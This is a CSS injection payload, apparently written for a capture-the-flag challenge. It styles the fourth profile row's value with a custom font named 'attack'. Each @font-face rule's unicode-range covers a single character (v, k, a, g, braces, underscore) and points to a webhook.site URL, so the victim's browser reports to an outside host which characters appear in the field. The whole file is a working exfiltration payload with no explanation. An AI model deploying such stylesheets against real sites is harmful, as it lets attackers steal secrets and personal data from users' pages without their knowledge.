@charset "UTF-8";

.profile-info .profile-row:nth-child(4) .value {
    font-family: attack !important;
    font-size: 16px;
    display: inline;
}

@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?v');
    unicode-range: U+0076;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?k');
    unicode-range: U+006B; 
}

@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?a');
    unicode-range: U+0061; 
}

@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?g');
    unicode-range: U+0067;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?%7B');
    unicode-range: U+007B;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?%7D');
    unicode-range: U+007D; 
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/34a466cd-f708-43e5-b8fa-9ccdea2518ad/flag?_');
    unicode-range: U+005F; 
}
